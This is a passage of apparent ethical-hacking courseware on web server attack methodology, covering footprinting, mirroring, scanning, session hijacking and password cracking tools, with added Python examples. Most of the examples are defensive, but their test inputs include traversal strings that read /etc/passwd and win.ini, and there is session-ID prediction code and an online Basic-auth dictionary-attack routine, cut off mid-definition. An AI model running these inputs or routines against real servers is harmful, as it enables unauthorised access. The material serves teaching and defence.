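    if hybrid_base_word(password) is not None:
        return "hybrid"
    if brute_force_seconds(password) < ONE_DAY:
        return "brute force under a day"
    return "brute force impractical"


if __name__ == "__main__":
    for pw in ("qwerty", "Fluffy2009!", "Zx9q", "T7#kL9!qPw2z"):
        print("%-14s %-26s %.3g s" % (pw, classify(pw), brute_force_seconds(pw)))
```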


Web Application Attacks

Vulnerabilities in web applications running on a Webserver provide a broad attack path for
Webserver compromise


Note: For complete coverage of web application attacks refer to Module 13: Hacking Web Applications

Web Application Attacks
Vulnerabilities in web applications running on a web server provide a broad attack path for web server compromise.

Directory Traversal
Directory traversal is an exploitation of HTTP through which attackers are able to access restricted directories and execute commands outside of the web server's root directory by manipulating a URL.
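As an added example (not courseware code), a Python resolver that maps a requested URL path onto the web root and refuses anything that escapes it, covering encoded, double-encoded and backslash traversal; WEB_ROOT and the sample paths are assumed values.

```python
# Added example (not courseware code): resolving a requested URL path under the
# web root so that traversal sequences cannot escape it, plus a log check for
# traversal attempts.  WEB_ROOT and the sample paths are constructed.
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"   # assumed document root


def normalise_request_path(url_path):
    """Decode twice (double-encoded %252e%252e is a common filter bypass) and
    treat backslashes as separators, as some servers do."""
    decoded = unquote(unquote(url_path))
    return decoded.replace("\\", "/")


def resolve_under_root(url_path, web_root=WEB_ROOT):
    """Return the absolute filesystem path for url_path, or None when the
    request would land outside web_root or carries a NUL byte."""
    path = normalise_request_path(url_path)
    if "\x00" in path:
        return None   # NUL truncation can hide the real extension from filters
    full = posixpath.normpath(posixpath.join(web_root, path.lstrip("/")))
    # The check is done on the normalised result, not on the raw string, so
    # "../" in the middle of an otherwise harmless path is handled too.
    if full == web_root or full.startswith(web_root + "/"):
        return full
    return None


def is_traversal_attempt(url_path):
    """Log-review helper: True if any path segment, after decoding, is '..'."""
    return ".." in normalise_request_path(url_path).split("/")


if __name__ == "__main__":
    for p in ("/index.html", "/images/../index.html", "/../../etc/passwd",
              "/..%2F..%2Fetc%2Fpasswd", "%252e%252e/%252e%252e/etc/passwd",
              "..\\..\\windows\\win.ini"):
        print("%-40s -> %s" % (p, resolve_under_root(p)))
```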

Parameter/Form Tampering
This type of tampering attack is intended to manipulate the parameters exchanged
between client and server in order to modify application data, such as user credentials
and permissions, price and quantity of products, etc.

Cookie Tampering
Cookie tampering is the method of poisoning or tampering with the client's cookie. Most such attacks are carried out when the cookie is sent from the client side to the server. Persistent and non-persistent cookies can be modified using different tools.

Module 12 Page 1634

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Command Injection Attacks
Command injection is an attack method in which a hacker alters the content of the web page by using HTML code and by identifying the form fields that lack valid constraints.

Buffer Overflow Attacks
Most web applications are designed to sustain some amount of data. If that amount is exceeded, the application may crash or may exhibit some other vulnerable behavior. The attacker uses this to advantage and floods the application with too much data, which in turn causes a buffer overflow attack.

Cross-Site Scripting (XSS) Attacks
Cross-site scripting is a method where an attacker injects HTML tags or scripts into a target website.

Denial-of-Service (DoS) Attack
A denial-of-service attack is a form of attack intended to terminate the operations of a website or a server and make it unavailable to its intended users.

Unvalidated Input and File injection Attacks
Unvalidated input and file injection attacks refer to the attacks carried by supplying
an unvalidated input or by injecting files into a web application.

Cross-Site Request Forgery (CSRF) Attack
A malicious web page causes the user's web browser to send requests to a malicious website where various vulnerable actions, not intended by the user, are performed. This kind of attack is dangerous in the case of financial websites.

SQL Injection Attacks
SQL injection is a code injection technique that uses the security vulnerability of a
database for attacks. The attacker injects malicious code into the strings that are later
on passed on to SQL Server for execution.

Session Hijacking
Session hijacking is an attack where the attacker exploits, steals, predicts, and negotiates the real valid web session control mechanism to access the authenticated parts of a web application.


Module Flow

Module Flow
So far we have discussed web server concepts and the various techniques used by attackers to hack web servers. Attackers usually hack a web server by following a procedural method. Now we will discuss the attack methodology used by attackers to compromise web servers.

- Webserver Concepts
- Webserver Attacks
- Attack Methodology
- Webserver Attack Tools
- Webserver Pen Testing
- Patch Management
- Webserver Security Tools
- Counter-measures

This section provides insight into the attack methodology and tools that help at various stages
of hacking.


Webserver Attack Methodology

[Slide diagram of stages: Information Gathering, Webserver Footprinting, Vulnerability Scanning, Hacking Webserver Passwords.]

Web Server Attack Methodology
Hacking a web server is accomplished in various stages. At each stage the attacker tries to gather more information about loopholes and tries to gain unauthorized access to the web server. The stages of web server attack methodology include:

Information Gathering
Every attacker tries to collect as much information as possible about the target web server. Once the information is gathered, he or she then analyzes the gathered information in order to find the security lapses in the current mechanism of the web server.

Web Server Footprinting
The purpose of footprinting is to gather more information about the security aspects of a web server with the help of tools or footprinting techniques. The main purpose is to know about its remote access capabilities, its ports and services, and the aspects of its security.

Mirroring Website
Website mirroring is a method of copying a website and its content onto another server for offline browsing.

Vulnerability Scanning
Vulnerability scanning is a method of finding various vulnerabilities and misconfigurations of a web server. Vulnerability scanning is done with the help of various automated tools known as vulnerability scanners.

Session Hijacking
Session hijacking is possible once the current session of the client is identified. Complete control of the user session is taken over by the attacker by means of session hijacking.

Hacking Web Server Passwords
Attackers use various password cracking methods like brute force attacks, hybrid attacks, dictionary attacks, etc. and crack web server passwords.


Webserver Attack Methodology: Information Gathering
Information gathering involves collecting information about the targeted company.
- Attackers search the Internet, newsgroups, bulletin boards, etc. for information about the company.
- Attackers use Whois, Traceroute, Active Whois, etc. tools and query the Whois databases to get details such as a domain name, an IP address, or an autonomous system number.

[Slide screenshot: WHOis.net ("Your Domain Starting Place...") showing WHOIS information for ebay.com; the same output is reproduced in Figure 12.13.]

Note: For complete coverage of information gathering techniques refer to Module 02: Footprinting and Reconnaissance
http://www.whois.net

Web Server Attack Methodology: Information Gathering

Every attacker, before hacking, first collects all the required information, such as the versions and technologies being used by the web server. Attackers search the Internet, newsgroups, bulletin boards, etc. for information about the company. Most of an attacker's time is spent in the information gathering phase alone; that is why information gathering is both an art and a science. There are many tools that can be used for information gathering or to get details such as a domain name, an IP address, or an autonomous system number. The tools include:
- Whois
- Traceroute
- Active Whois
- Nmap
- Angry IP Scanner
- Netcat

Whois


Source: http://www.whois.net
Whois allows you to perform a domain whois search and a whois IP lookup and search the
whois database for relevant information on domain registration and availability. This can help
provide insight into a domain's history and additional information. It can be used for
performing a search to see who owns a domain name, how many pages from a site are listed
with Google, or even search the Whois address listings for a website's owner.

WHOis.net - Your Domain Starting Place...

WHOIS information for ebay.com:***
[Querying whois.verisign-grs.com]
[whois.verisign-grs.com]
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: EBAY.COM
Registrar: MARKMONITOR INC.
Whois Server: whois.markmonitor.com
Referral URL: http://www.markmonitor.com
Name Server: SJC-DNS1.EBAYDNS.COM
Name Server: SJC-DNS2.EBAYDNS.COM
Name Server: SMF-DNS1.EBAYDNS.COM
Name Server: SMF-DNS2.EBAYDNS.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Status: serverDeleteProhibited
Status: serverTransferProhibited
Status: serverUpdateProhibited
Updated Date: 15-sep-2010
Creation Date: 04-aug-1995
Expiration Date: 03-aug-2018

FIGURE 12.13: WHOIS Information Gathering


Webserver Attack Methodology: Webserver Footprinting
- Telnet a Webserver to footprint a Webserver and gather information such as server name, server type, operating systems, applications running, etc.
- Gather valuable system-level information such as account details, operating system, software versions, server names, and database schema details
- Use tools such as ID Serve, httprecon, and Netcraft to perform footprinting

Web Server Attack Methodology: Webserver Footprinting
The purpose of footprinting is to gather account details, operating system and other software versions, server names, database schema details, and as much information as possible about the security aspects of a target web server or network. The main purpose is to know about its remote access capabilities, open ports and services, and the security mechanisms implemented. Telnet to a web server to footprint it and gather information such as server name, server type, operating system, applications running, etc. Examples of tools used for footprinting include ID Serve, httprecon, Netcraft, etc.

Netcraft
Source: http://toolbar.netcraft.com
Netcraft is a tool used to determine the OSes in use by the target organization. It has already
been discussed in detail in the Footprinting and Reconnaissance module.


[Figure 12.14 screenshot: Netcraft "Search Web by Domain" (3rd August 2012, "Explore 1,045,745 web sites visited by users of the Netcraft Toolbar"), search "site contains microsoft". Results for microsoft: Found 252 sites. Columns: Site, Site Report, First seen, Netblock, OS. Sites listed: www.microsoft.com, support.microsoft.com, technet.microsoft.com, windows.microsoft.com, msdn.microsoft.com, office.microsoft.com, social.technet.microsoft.com, answers.microsoft.com, www.update.microsoft.com, social.msdn.microsoft.com, go.microsoft.com, windowsupdate.microsoft.com, update.microsoft.com, www.microsofttranslator.com, search.microsoft.com, www.microsoftstore.com, login.microsoftonline.com, wer.microsoft.com. Netblocks shown include microsoft corp, microsoft limited, mshotmail, akamai technologies, akamai international b.v, digital river ireland ltd.; OS values shown include citrix netscaler, windows server 2008, windows server 2003, linux, f5 big-ip, unknown.]

FIGURE 12.14: Webserver Footprinting


Webserver Footprinting Tools

[Slide screenshots: httprecon 7.3 fingerprinting http://www.nytimes.com:80/ (Target: Sun ONE Web Server 6.1; matchlist of 352 implementations) and ID Serve v1.02 querying www.google.com (the server identified itself as gws). See Figures 12.15 and 12.16.]

http://www.computec.ch
http://www.grc.com

Web Server Footprinting Tools
We have already discussed the Netcraft tool. In addition to Netcraft, there are two more tools that allow you to perform web server footprinting: Httprecon and ID Serve.

Httprecon
Source: http://www.computec.ch

Httprecon is a tool for advanced web server fingerprinting. The httprecon project is doing some
research in the field of web server fingerprinting, also known as http fingerprinting. The goal is
the highly accurate identification of given httpd implementations. This software shall improve
the ease and efficiency of this kind of enumeration.


[Figure 12.15 screenshot: httprecon 7.3 - http://www.nytimes.com:80/. Target (Sun ONE Web Server 6.1): http://www.nytimes.com, port 80. Tabs: GET existing | GET long request | GET non-existing | GET wrong protocol | HEAD existing | OPTIONS common. Response shown:]
HTTP/1.1 200 OK
Date: Thu, 11 Oct 2012 09:34:37 GMT
Server: Apache
expires: Thu, 01 Dec 1994 16:00:00 GMT
cache-control: no-cache
pragma: no-cache
Set-Cookie: ALT_ID=007f010021bb479dd5aa0055; Expires=Fri, 11 Oct 2013 09:34:37 GMT; Path=/; Domain=.nytimes.com
Set-cookie: adxcs=-; path=/; domain=.nytimes.com
Vary: Host

Matchlist (352 Implementations) | Fingerprint Details | Report Preview
Name                                      Hits  Match %
Oracle Application Server 10g 10.1.2.2.0  58    81.6301408450704
Sun Java System Web Server 7.0            57    80.2816301408451
Abyss 2.5.0.0 X1                          56    78.8732334366137
Apache 2.0.52                             56    78.8732334366137
Apache 2.2.6                              56    78.8732334366137
Ready.

FIGURE 12.15: Httprecon Screenshot

ID Serve
Source: http://www.grc.com
ID Serve is a simple Internet server identification utility. ID Serve can almost always identify the
make, model, and version of any website's server software. This information is usually sent in
the preamble of replies to web queries, but it is not shown to the user. ID Serve can also
connect with non-web servers to receive and report that server's greeting message. This
generally reveals the server's make, model, version, and other potentially useful information.
Simply by entering any IP address, ID Serve will attempt to determine the associated domain
name.


[Figure 12.16 screenshot: ID Serve, Internet Server Identification Utility, v1.02, Personal Security Freeware by Steve Gibson, Copyright (c) 2003 by Gibson Research Corp. Tabs: Background | Server Query | Q&A/Help. "Enter or copy / paste an Internet server URL or IP address here (example: www.microsoft.com):" www.google.com. "Query The Server: When an Internet URL or IP has been provided above, press this button to initiate a query of the specified server." Server query processing:]
Server: gws
Content-Length: 221
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
[The server identified itself as: gws. Buttons: Copy, Goto ID Serve web page, Exit.]

FIGURE 12.16: ID Serve
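As an added example, not the courseware's or ID Serve's code, a Python parser for the response preamble that ID Serve displays: it extracts the Server banner, the product versions it leaks, and which hardening headers are absent, so an administrator can see what footprinting reveals about their own server. The sample response is constructed, modelled on the headers in Figure 12.16.

```python
# Added example, not the courseware's or ID Serve's code: parse the header
# preamble of an HTTP response (the part ID Serve displays) and report what a
# server discloses and which hardening headers are absent.  SAMPLE_RESPONSE is
# constructed, modelled on the Server / X-Frame-Options lines in Figure 12.16.
import re

SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 11 Oct 2012 09:34:37 GMT\r\n"
    "Server: Apache/2.2.6 (Unix) PHP/5.2.4\r\n"
    "X-Powered-By: PHP/5.2.4\r\n"
    "Content-Length: 221\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "Connection: close\r\n"
    "\r\n"
    "<html>...</html>"
)

# Response headers a hardened web server is expected to send.
EXPECTED_HARDENING = ("Strict-Transport-Security", "Content-Security-Policy",
                      "X-Content-Type-Options", "X-Frame-Options")

# product/major.minor[.patch] tokens such as Apache/2.2.6 or PHP/5.2.4
VERSION_RE = re.compile(r"[A-Za-z][\w.-]*/\d+(?:\.\d+)+")


def parse_preamble(raw_response):
    """Split the preamble into (status_line, {lower-case header: value}).
    Only the part before the blank line is examined; the body is ignored."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def disclosed_versions(headers):
    """Product/version strings leaked via Server and X-Powered-By."""
    found = set()
    for key in ("server", "x-powered-by"):
        found.update(VERSION_RE.findall(headers.get(key, "")))
    return sorted(found)


def missing_hardening_headers(headers):
    """Hardening headers from EXPECTED_HARDENING that the server did not send."""
    return [h for h in EXPECTED_HARDENING if h.lower() not in headers]


def fingerprint_report(raw_response):
    """What a footprinting tool would learn from this server, seen from the
    defender's side: the banner, leaked versions and absent protections."""
    status, headers = parse_preamble(raw_response)
    return {
        "status": status,
        "server": headers.get("server", "<not sent>"),
        "versions": disclosed_versions(headers),
        "missing": missing_hardening_headers(headers),
    }


if __name__ == "__main__":
    for key, value in fingerprint_report(SAMPLE_RESPONSE).items():
        print("%-9s %s" % (key + ":", value))
```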


Webserver Attack Methodology: Mirroring a Website
- Mirror a website to create a complete profile of the site's directory structure, file structure, external links, etc.
- Search for comments and other items in the HTML source code to make footprinting activities more efficient
- Use tools such as HTTrack, WebCopier Pro, BlackWidow, etc. to mirror a website

[Slide screenshot: HTTrack, "Site mirroring in progress [2/14 (+13), 327948 bytes] - [Test Project.whtt]"; see Figure 12.17.]

http://www.httrack.com

Web Server Attack Methodology: Mirroring a Website
Website mirroring is a method of copying a website and its content onto another server. By mirroring a website, a complete profile of the site's directory structure, file structure, external links, etc. is created. Once the mirror is created, search for comments and other items in the HTML source code to make footprinting activities more efficient. Tools used for web server mirroring include HTTrack, Webripper 2.0, WinWSD, WebCopier, and BlackWidow.

C
Source: http://www.httrack.com
HTTrack is an offline browser utility. It allows you to download a World W ide W eb site from the
Internet to a local directory, building recursively all directories, getting HTML, images, and other
files from the server to your computer. HTTrack arranges the original site's relative linkstructure. Simply open a page of the "mirrored" website in your browser, and you can browse
the site from link to link, as if you were viewing it online.
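The source-code review that a mirror makes possible, as an added example (not code from the page, from HTTrack, or from any of the tools named above): it walks a set of mirrored pages, pulls out HTML comments and every href/src/action reference, and builds the profile the text describes: directories, files, external hosts, and paths leaked in comments. The two pages, their host, paths and comments are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample of a mirrored site: page URL -> HTML as saved on disk.
# The host, paths and comments are invented for this example.
MIRRORED_PAGES = {
    "http://www.example.test/index.html": """
<html><head><title>Home</title></head><body>
<!-- TODO: remove /admin/ link before go-live -->
<a href="/about/team.html">Team</a>
<a href="/admin/login.php">Admin</a>
<script src="/js/app.js?v=2.3.1"></script>
<img src="http://cdn.example-static.test/logo.png">
</body></html>""",
    "http://www.example.test/about/team.html": """
<html><body>
<!-- backup copy kept at /old/site_backup.zip -->
<a href="../index.html">Home</a>
<form action="https://partner.example.test/api/contact">...</form>
</body></html>""",
}


class ProfileParser(HTMLParser):
    """Collect HTML comments and every href/src/action reference on one page."""

    def __init__(self):
        super().__init__()
        self.comments = []
        self.refs = []

    def handle_comment(self, data):
        self.comments.append(data.strip())

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src", "action") and value:
                self.refs.append(value)


# Absolute paths mentioned inside comments are worth probing on the live site.
PATH_IN_COMMENT = re.compile(r"(/[\w./-]+)")


def profile_mirror(pages, site_host):
    """Return the footprinting profile of a mirrored site.

    pages: dict of absolute page URL -> HTML text (the mirrored tree)
    site_host: the mirrored host; any other host counts as an external link
    """
    directories, files, external, comment_paths = set(), set(), set(), set()
    comments = []
    for page_url, html in pages.items():
        parser = ProfileParser()
        parser.feed(html)
        for comment in parser.comments:
            comments.append((page_url, comment))
            comment_paths.update(PATH_IN_COMMENT.findall(comment))
        for ref in parser.refs:
            parsed = urlparse(urljoin(page_url, ref))  # resolve relative links
            if parsed.netloc != site_host:
                external.add(parsed.netloc)
                continue
            files.add(parsed.path)
            parts = parsed.path.split("/")[1:-1]  # every ancestor directory
            for depth in range(len(parts)):
                directories.add("/" + "/".join(parts[: depth + 1]) + "/")
    return {
        "directories": sorted(directories),
        "files": sorted(files),
        "external_hosts": sorted(external),
        "comments": comments,
        "paths_leaked_in_comments": sorted(comment_paths),
    }


if __name__ == "__main__":
    for key, value in profile_mirror(MIRRORED_PAGES, "www.example.test").items():
        print(f"{key}: {value}")
```

Run against a real HTTrack mirror, `pages` would be filled by walking the mirror directory and mapping each saved file back to its original URL; the comment regex is deliberately loose, since a leaked path like /old/site_backup.zip is exactly the kind of item the text says to look for.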


[Figure 12.17: HTTrack window "Site mirroring in progress [2/14 (+13), 327948 bytes] - [Test Project.whtt]". Left pane: the local directory tree (Local Disk C: with CEH-Tools, dell, inetpub, Intel, MyWebSites, Program Files, Program Files (x86), Users, Windows, NTUSER.DAT; Local Disk D:, DVD RW Drive E:, New Volume F:). Right pane, In progress: Parsing HTML file. Information: Bytes saved 320.26KB; Time 2min22s; Transfer rate 0B/s (1.19MB/s); Active connections 1; Links scanned 2/14 (+13); Files written 14; Files updated 0; Errors 0. Buttons: Back, Next, Cancel, Help.]

FIGURE 12.17: Mirroring a Website


Webserver Attack Methodology:
Vulnerability Scanning

CEH

Perform vulnerability scanning to identify weaknesses in a network and determine if the system can be exploited

Sniff the network traffic to find out active systems, network services, applications, and vulnerabilities present

Use a vulnerability scanner such as HP WebInspect, Nessus, Zaproxy, etc. to find hosts, services, and vulnerabilities

Test the web server infrastructure for any misconfiguration, outdated content, and known vulnerabilities

Web Server Attack Methodology: Vulnerability Scanning

Vulnerability scanning is a method of determining the vulnerabilities and misconfigurations of a target web server or network. It is done with the help of automated tools known as vulnerability scanners.
Vulnerability scanning identifies the vulnerabilities that exist in the web server and its configuration, and so helps to determine whether the web server is exploitable. Sniffing the network traffic complements the scan: it reveals active systems, network services, applications, and vulnerabilities present without sending probes of its own.
Attackers also test the web server infrastructure for misconfiguration, outdated content, and known vulnerabilities. A scanner's checks against a web server typically include the server banner and the versions it discloses, missing security-related response headers, directory listings, and cookies issued without protective flags. Various tools used for vulnerability scanning, such as HP WebInspect, Nessus, and Paros proxy, find hosts, services, and vulnerabilities.
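An added example, not the page's code and not any scanner vendor's, of the per-response checks a web server scanner runs: it parses one raw HTTP response and flags version disclosure in the Server/X-Powered-By banners, missing security headers, an enabled directory listing, and a session cookie issued without the HttpOnly and Secure flags. Both responses are constructed (the Apache/PHP versions and the cookie value are invented), and the header list is this example's choice, not a scanner's full policy.

```python
import re

# Constructed raw HTTP responses as a scanner's probe (or a banner grab)
# would receive them. Versions, host and cookie value are invented.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.15 (CentOS)\r\n"
    "X-Powered-By: PHP/5.3.3\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: PHPSESSID=3b1f9c2e; path=/\r\n"
    "\r\n"
    "<html><head><title>Index of /backup</title></head>"
    "<body><h1>Index of /backup</h1></body></html>"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "X-Frame-Options: DENY\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Content-Security-Policy: default-src 'self'\r\n"
    "Set-Cookie: PHPSESSID=3b1f9c2e; path=/; HttpOnly; Secure\r\n"
    "\r\n"
    "<html><head><title>Welcome</title></head><body></body></html>"
)

# Header set chosen for this example; a real scanner's policy is longer.
REQUIRED_HEADERS = ("x-frame-options", "x-content-type-options", "content-security-policy")
BANNER_HEADERS = ("server", "x-powered-by", "x-aspnet-version")
VERSION = re.compile(r"/\d+(\.\d+)+")  # e.g. Apache/2.2.15, PHP/5.3.3


def parse_response(raw):
    """Split a raw response into (status code, {lowercased header: [values]}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split()[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body


def check_response(raw):
    """Return the misconfiguration findings for one response."""
    status, headers, body = parse_response(raw)
    findings = []
    for name in BANNER_HEADERS:  # banners that give away software versions
        for value in headers.get(name, []):
            if VERSION.search(value):
                findings.append(f"version disclosure in {name}: {value}")
    for name in REQUIRED_HEADERS:  # browser-side protections the server should set
        if name not in headers:
            findings.append(f"missing header: {name}")
    if status == 200 and re.search(r"<title>\s*Index of /", body, re.IGNORECASE):
        findings.append("directory listing enabled")
    for cookie in headers.get("set-cookie", []):  # session cookies without flags
        cookie_name = cookie.split("=", 1)[0]
        attrs = {part.strip().split("=", 1)[0].lower() for part in cookie.split(";")[1:]}
        for flag in ("httponly", "secure"):
            if flag not in attrs:
                findings.append(f"cookie {cookie_name} lacks {flag}")
    return findings


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, check_response(raw) or ["no findings"])
```

The weak response yields eight findings and the hardened one none; in practice the raw response would come from a socket read of the same HEAD or GET request an ID Serve-style banner grab sends, and each finding maps to a configuration change on the server (ServerTokens/expose_php, header directives, Options -Indexes, cookie flags).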

Nessus
Source: http://www.nessus.org
Nessus is a security scanning tool that scans systems remotely and reports the vulnerabilities it detects before an attacker can exploit them. Its features include high-speed discovery, configuration auditing, asset profiling, sensitive data discovery, patch management integration, and vulnerability analysis of your security posture, with features that enhance usability, effectiveness, efficiency, and communication with all parts of your organization.

FIGURE 12.18: Nessus Screenshot


Webserver Attack Methodology:
Session Hijacking

CEH

Sniff valid session IDs to gain unauthorized access to the web server and snoop the data
Use session hijacking techniques such as session fixation, session sidejacking, cross-site scripting, etc. to capture valid session cookies and IDs
Use tools such as Burp Suite, Hamster, Firesheep, etc. to automate session hijacking

[Slide screenshot: Burp Suite Free Edition v1.4.01, Target > Site map tab; the same capture is reproduced as Figure 12.19 below.]

http://portswigger.net
Note: For complete coverage of Session Hijacking concepts and techniques refer to Module 11: Session Hijacking

Web Server Attack Methodology: Session Hijacking

Session hijacking is possible once the current session of the client is identified. Complete control of the user session can be taken over by the attacker once the user has authenticated to the server. At the transport level, attackers perform session hijacking with the help of sequence number prediction tools: after identifying the open session, the attacker predicts the sequence number of the next packet and sends data packets before the legitimate user sends the response with the correct sequence number. At the application level the same idea applies to session identifiers: if the web server issues session IDs that are predictable (for example, sequential or low-entropy values), an attacker who observes a few of them can derive the next one without sniffing it at all. In addition to these techniques, you can also use other session hijacking techniques such as session fixation, session sidejacking, cross-site scripting, etc. to capture valid session cookies and IDs. Various tools used for session hijacking include Burp Suite, Hamster, Firesheep, etc.

Burp Suite
Source: http://portswigger.net
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. The key components of Burp Suite include the proxy, scanner, intruder, repeater, and sequencer tools, among others; the sequencer in particular samples session tokens and measures how random they are.
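An added example, not code from the page or from Burp Suite, of the predictability check a session-ID sampling tool performs before an attacker tries to guess the next ID: it measures per-position Shannon entropy over a sample of tokens, detects a constant step between consecutive values, and derives the next token when one exists. Both samples are constructed: the predictable set counts up in steps of two from an invented base, the other is hand-written hex with no structure.

```python
import math
from collections import Counter

# Constructed samples of session IDs as captured from two hypothetical servers.
# PREDICTABLE_IDS count up in steps of two from an invented base value;
# RANDOM_IDS are hand-written hex with no structure.
PREDICTABLE_IDS = [f"{0x4F2A10 + 2 * i:08x}" for i in range(12)]
RANDOM_IDS = [
    "9f3c1a7e2b6d0c41", "0a7e5d2c9b1f8e63", "d4b2f09e7c3a15e8", "37e1c8a0f5b26d94",
    "b8d05f3e1a9c7246", "6c4a9e1f0d7b3852", "e2f71b6c4a0d9e35", "15c9d3e8b7a2f460",
    "a07f2e6d1c8b5943", "4e8b1d7a3f6c0e29", "c3a6e0f9d2b17584", "7d1e4b8c5a2f3906",
]


def entropy_per_position(ids):
    """Mean Shannon entropy (bits) of the character at each position across the sample."""
    width = len(ids[0])
    n = len(ids)
    total = 0.0
    for pos in range(width):
        counts = Counter(token[pos] for token in ids)
        total -= sum(c / n * math.log2(c / n) for c in counts.values())
    return total / width


def constant_step(ids):
    """Return the step if every consecutive pair differs by the same integer, else None."""
    values = [int(token, 16) for token in ids]
    steps = {b - a for a, b in zip(values, values[1:])}
    return steps.pop() if len(steps) == 1 else None


def predict_next(ids):
    """Guess the next ID the server will issue, as an attacker would; None if not derivable."""
    step = constant_step(ids)
    if step is None:
        return None
    return f"{int(ids[-1], 16) + step:0{len(ids[0])}x}"


def assess(ids, min_entropy=2.0):
    """Flag a sample as predictable on a constant step or low per-position entropy.

    The 2.0-bit threshold is this example's choice for a sample this small.
    """
    step = constant_step(ids)
    entropy = entropy_per_position(ids)
    return {
        "constant_step": step,
        "entropy_per_position": round(entropy, 3),
        "predictable": step is not None or entropy < min_entropy,
    }


if __name__ == "__main__":
    for label, ids in (("predictable", PREDICTABLE_IDS), ("random", RANDOM_IDS)):
        print(label, assess(ids), "next:", predict_next(ids))
```

The sequential sample is caught twice over (constant step of 2 and under half a bit of entropy per position), and the next value 004f2a28 is exactly what an attacker would present in the session cookie; the hex sample has no constant step and roughly three bits per position, so nothing can be derived from it. Twelve tokens is enough to show the arithmetic; a real assessment samples thousands, which is what the Burp sequencer is for.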


[Figure 12.19: Burp Suite Free Edition v1.4.01, Target > Site map. Filter: hiding not found items; hiding CSS, image and general binary content; hiding 4xx responses; hiding empty folders. The site tree lists http://economictimes.indiatimes.com and http://edition.cnn.com; the selected entry is a GET to /.element/ssi/ads.iframes/ (status 200, length 676, MIME type HTML). Context menu: add item to scope, spider this branch, actively scan this branch, passively scan this branch, engagement tools [pro version only], compare site maps, expand branch, expand requested items, delete branch, copy URLs in this branch, copy links in this branch, save selected items. The request pane shows the captured request for /.element/ssi/intl/breaking_news/3.0/banner.html?csiID=csi1 HTTP/1.1 with Host: edition.cnn.com, User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1 and Accept: text/javascript, text/html, application/xml, text/xml.]

FIGURE 12.19: Burp Suite Screenshot


Webserver Attack Methodology:
Hacking Web Passwords

Use password cracking techniques such as brute force attack, dictionary attack, and password guessing to crack web server passwords
Use tools such as Brutus, THC-Hydra, etc.

[Slide screenshot: Brutus - AET2 - www.hoobie.net/brutus - (January 2000) running an HTTP (Basic Auth) word-list attack against 10.0.0.17; the same capture is reproduced as Figure 12.20 below.]

http://www.hoobie.net

Web Server Attack Methodology: Hacking Web Passwords

One of the main tasks of any attacker is password hacking. By hacking a password, the attacker gains complete control over the web server. Various methods used by attackers for password hacking include password guessing, dictionary attacks, brute force attacks, hybrid attacks, syllable attacks, precomputed hashes, rule-based attacks, distributed network attacks, rainbow attacks, etc. Against a web server these are usually run online: the tool submits each candidate as a real authentication attempt (for HTTP Basic authentication, an Authorization header carrying the Base64-encoded user:password pair) and judges the result from the server's status code. Password cracking can also be performed with the help of tools such as Brutus, THC-Hydra, etc.

Brutus
Source: http://www.hoobie.net

Brutus is an online or remote password cracking tool. Attackers use this tool for hacking web passwords without the knowledge of the victim. The features of the Brutus tool are explained briefly on the following slides.
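An added example (not Brutus or THC-Hydra code, and not from the page) of what an online HTTP (Basic Auth) dictionary attack actually sends and checks: each user/password pair becomes a HEAD request carrying a Base64 Authorization header, a 200 counts as a hit and a 401 as a reject, and the attempt ceiling is the product of the two list sizes (6 users and 818 passwords give the 4908 attempts reported in the Brutus log). The target here is a constructed stand-in function with invented credentials so the example runs offline; against a real server the `send` callable would write the request to a socket and return the status code from the response line.

```python
import base64
import itertools

# Constructed target: a stand-in for a web server protecting a path with
# HTTP Basic authentication. Credentials are invented for this example.
VALID_CREDENTIALS = {"admin": "academic", "backup": "backup2012"}


def basic_auth_header(user, password):
    """Value of the Authorization header for HTTP (Basic Auth)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def build_head_request(host, path, user, password):
    """One authentication attempt; HEAD keeps the answer to a status line and headers."""
    return (
        f"HEAD {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Authorization: {basic_auth_header(user, password)}\r\n"
        "Connection: keep-alive\r\n"
        "\r\n"
    )


def fake_target(raw_request):
    """Decode the Authorization header and answer 200 or 401 as a server would."""
    for line in raw_request.split("\r\n"):
        if line.lower().startswith("authorization: basic "):
            token = line.split(" ", 2)[2]
            user, _, password = base64.b64decode(token).decode().partition(":")
            if VALID_CREDENTIALS.get(user) == password:
                return 200
    return 401


def max_attempts(users, passwords):
    """Word-list mode tries every pair, so the ceiling is the product of the list sizes."""
    return len(users) * len(passwords)


def dictionary_attack(send, host, path, users, passwords, stop_on_first=False):
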